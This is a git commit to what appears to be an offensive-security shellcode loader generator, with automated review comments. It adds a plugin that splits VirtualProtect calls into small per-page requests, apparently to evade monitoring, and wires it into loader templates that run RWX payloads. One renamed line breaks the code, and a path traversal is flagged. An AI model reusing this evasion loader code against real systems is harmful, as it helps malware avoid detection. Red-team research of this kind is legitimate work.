feature: MyVirtualProtect

Dobin Rutishauser
2024-06-24 16:58:44 +02:00
parent 31be61ee8e
commit b6db721c12
12 changed files with 68 additions and 6 deletions
+17
@@ -286,6 +286,23 @@
</select>
</div>
</div>
<div class="form-group row">
<label for="virtualprotect_style" class="col-sm-5 col-form-label">
VirtualProtect
</label>
<div class="col-sm-7">
<select class="form-select" name="virtualprotect" id="virtualprotect"
aria-label="virtualprotect" onchange="this.form.submit()">
{% for name in virtualprotectstyles %}
<option value="{{name}}"
{% if name in project.settings.plugin_virtualprotect %} selected {% endif %}
>{{name}}
</option>
{% endfor %}
</select>
</div>
</div>
</div>
</div>
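Review bot: The `<label for="virtualprotect_style">` does not reference the select, whose id is `virtualprotect`, so the label is not associated with the control; `for="virtualprotect"` would match. The selected-option test `{% if name in project.settings.plugin_virtualprotect %}` is a substring check on what appears to be a string setting (its default elsewhere in this commit is `"standard"`), so any option whose name is contained in the stored value is marked selected. `{% if name == project.settings.plugin_virtualprotect %}` states the intent. The enclosing form starts and ends outside this hunk.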
+3
@@ -105,6 +105,7 @@ def project(name):
guardrail_styles = list_files(PATH_GUARDRAILS)
antiemulation_styles = list_files(PATH_ANTIEMULATION)
decoy_styles = list_files(PATH_DECOY)
virtualprotect_styles = list_files(PATH_VIRTUALPROTECT)
return render_template('project.html',
project_name = name,
@@ -136,6 +137,7 @@ def project(name):
guardrailstyles = guardrail_styles,
antiemulationstyles = antiemulation_styles,
decoystyles = decoy_styles,
virtualprotectstyles = virtualprotect_styles
)
@@ -216,6 +218,7 @@ def add_project():
settings.payload_location = PayloadLocation[payload_location]
settings.plugin_guardrail_data = request.form.get('guardrail_data', '')
settings.plugin_virtualprotect = request.form.get('virtualprotect')
# overwrite project
project = storage.get_project(project_name)
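Review bot: `settings.plugin_virtualprotect = request.form.get('virtualprotect')` stores the form value with no default and no membership check, and `create_c_from_template` later concatenates it into `PATH_VIRTUALPROTECT + "{}.c"` and opens the result. A request without the field yields `None` and therefore `None.c`, and a value containing path separators would be opened outside the plugin directory and then rendered as a template. I would default it with `request.form.get('virtualprotect', 'standard')` and reject any value not in `list_files(PATH_VIRTUALPROTECT)`, which is the same list the select is populated from. `add_project` continues beyond the visible lines, so the other plugin settings may need the same check.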
+2 -1
@@ -15,6 +15,7 @@ char *supermega_payload;
{{plugin_executionguardrail}}
{{plugin_virtualprotect}}
/* VirtualAlloc -> rw -> rx
@@ -49,7 +50,7 @@ int main()
// to: dest[]
{{ plugin_decoder }}
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 7;
}
+2 -2
@@ -39,13 +39,13 @@ int main()
// Call: Decoy plugin
decoy();
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
return 16;
}
{{ plugin_decoder }}
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 16;
}
@@ -166,7 +166,7 @@ int main()
// Call: Decoy plugin
decoy();
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[]
// TO dest[]
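Review bot: The new line `dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);` replaces an allocation call, not a protection change. The wrapper added in this commit is declared `BOOL MyVirtualProtect(LPVOID, SIZE_T, DWORD, PDWORD)`, so `dest` receives a BOOL and the fourth argument is a constant where a `PDWORD` is expected. This looks like an over-broad rename; the line should stay `dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);`. `main()` continues outside the hunk.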
@@ -201,7 +201,7 @@ int main()
// Call: Decoy plugin
decoy();
VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[]
// TO dest[]
+1 -1
@@ -5,7 +5,7 @@
char *supermega_payload;
/* peb_walk
Standard shellcode which will resolve IAT by itself with a peb walk
Test shellcode which will resolve IAT by itself with a peb walk
no IAT reuse is performed
no data reuse is performed
*/
+9
@@ -0,0 +1,9 @@
BOOL MyVirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldprotect
) {
return VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldprotect);
}
+19
@@ -0,0 +1,19 @@
// How many bytes we VirtualProtect
#define VP_SIZE 16
BOOL MyVirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldprotect
) {
char *dest = (char *)lpAddress;
for(int n=0; n<(dwSize/4096)+1; n++) {
if (VirtualProtect(dest + (n * 4096), VP_SIZE, flNewProtect, lpflOldprotect) == 0) {
return FALSE;
}
}
return TRUE;
}
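Review bot: The `VP_SIZE` comment omits that memory protection is applied per page, so each 16-byte request in the loop still changes the whole page containing it. The requested size is therefore not the affected size, which matters to anyone reading telemetry for these calls. I would make the comment say so, e.g. `// Bytes requested per call; the whole containing page changes protection`. The function also needs a short header comment noting that `lpflOldprotect` is overwritten on every iteration, so the caller receives only the previous protection of the last page touched. Finally, `int n` is compared against an expression of type `SIZE_T`; declaring `n` as `SIZE_T` avoids the signed/unsigned comparison.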
+1
@@ -18,6 +18,7 @@ PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
PATH_GUARDRAILS = "data/source/guardrails/"
PATH_VIRTUALPROTECT = "data/source/virtualprotect/"
PATH_WEB_PROJECT = "projects/"
+2
@@ -18,6 +18,8 @@ class Settings():
self.plugin_decoy = "none"
self.plugin_guardrail = "none"
self.plugin_guardrail_data = "C:\\Users\\"
self.plugin_virtualprotect = "standard"
self.plugin_virtualprotect_data = ""
self.dllfunc: str = "" # For DLL injection
+10
@@ -27,6 +27,15 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
# Plugin: VirtualAlloc
filepath_virtualprotect = PATH_VIRTUALPROTECT + "{}.c".format(
settings.plugin_virtualprotect)
with open(filepath_virtualprotect, "r", encoding='utf-8') as file:
plugin_virtualprotect = file.read()
plugin_virtualprotect = Template(plugin_virtualprotect).render({
'virtualprotect_data': settings.plugin_virtualprotect_data,
})
# Plugin: Execution Guardrails
filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
settings.plugin_guardrail)
@@ -75,6 +84,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoy': plugin_decoy,
'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
'plugin_virtualprotect': plugin_virtualprotect,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file:
file.write(rendered_template)
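Review bot: The section comment `# Plugin: VirtualAlloc` labels code that loads the VirtualProtect plugin; `# Plugin: VirtualProtect` would match the variable names and `PATH_VIRTUALPROTECT`. The block renders `virtualprotect_data` from `settings.plugin_virtualprotect_data`, which the visible hunks of this commit only ever initialise to an empty string, so a comment saying the value is reserved for plugins that take a parameter would explain why it is passed. `create_c_from_template` starts and ends outside these hunks.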